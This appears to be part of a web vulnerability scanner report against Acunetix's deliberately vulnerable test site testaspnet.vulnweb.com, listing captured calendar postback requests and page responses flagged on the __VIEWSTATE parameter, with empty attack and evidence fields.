Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8619&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgCARz7ZltsIZGRkXxDJdgeYdlBiACDBpf1Vh1iqiOY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKM39aDAQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogbx5HL5PbBrNqevRsysCYtcagdFVA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:23:01 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgCARz7ZltsIZGRkXxDJdgeYdlBiACDBpf1Vh1iqiOY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKM39aDAQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogbx5HL5PbBrNqevRsysCYtcagdFVA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:White" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8618&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgDA3RMQltsIZGRkej006kpMoecHd5ozEi4%2FlszHV2U%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKg8OuhDwKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogai3aZ6ODiVrHmi7yat%2FBniuL08bg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:20:05 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgDA3RMQltsIZGRkej006kpMoecHd5ozEi4/lszHV2U=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKg8OuhDwKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogai3aZ6ODiVrHmi7yat/BniuL08bg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:White" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1121 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
